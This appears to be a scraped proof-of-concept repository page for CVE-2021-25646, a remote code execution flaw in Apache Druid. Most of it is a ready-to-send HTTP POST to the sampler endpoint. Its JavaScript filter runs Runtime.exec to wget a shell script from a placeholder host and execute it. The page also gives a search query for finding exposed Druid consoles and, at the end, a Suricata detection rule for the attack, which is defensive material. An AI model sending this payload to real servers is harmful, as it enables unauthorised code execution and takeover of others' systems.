来源

关联漏洞

介绍

# Apache Druid RCE

# title="druid" && title=="Apache Druid"

POST /druid/indexer/v1/sampler?for=filter HTTP/1.1

Host: x.x.x.x:8888

Content-Length: 612

Accept: application/json, text/plain, */*

Origin: http://x.x.x.x:8888

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36 SE 2.X MetaSr 1.0

Content-Type: application/json;charset=UTF-8

Referer: http://x.x.x.x:8888/unified-console.html

Accept-Language: zh-CN,zh;q=0.9

Connection: close


{"type":"index","spec":{"ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"quickstart/tutorial/","filter":"wikiticker-2015-09-12-sampled.json.gz"}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"json","timestampSpec":{"column":"time","format":"iso"},"dimensionsSpec":{}}},"transformSpec":{"transforms":[],"filter":{"type":"javascript",
"function":"function(value){return java.lang.Runtime.getRuntime().exec('wget http://x.x.x.x/1.txt -O /tmp/1.sh && sh /tmp/1.sh')}",
"dimension":"added",
"":{
"enabled":"true"
}
}}}},"samplerConfig":{"numRows":500,"cacheKey":"73a90acaae2b1ccc0e969709665bc62f"}}


# Detection rules

alert http any any -> any any (msg:"ET EXPLOIT CVE-2021-25646 Apache Druid RCE POST"; flow:established,to_server; content:"POST"; http_method;content:"/druid/indexer/v1/sampler?for=filter"; http_uri; content:"java.lang.Runtime.getRuntime().exec(";http_client_body; nocase; reference:url,mp.weixin.qq.com/s/Eny6AnFarvvpjeEJNMfTrw; reference:cve,2021-25646; classtype:web-application-attack; sid:2031533; rev:2; metadata:affected_product Web_Server_Applications, created_at 2021_02_03, cve CVE_2021_25646, former_category EXPLOIT, signature_severity Major, updated_at 2021_02_03;)

文件快照

 [4.0K]  /data/pocs/19efbb8417eb2f65f2eb77ea8d38c849b6bead93
└── [1.7K]  README.md

0 directories, 1 file

备注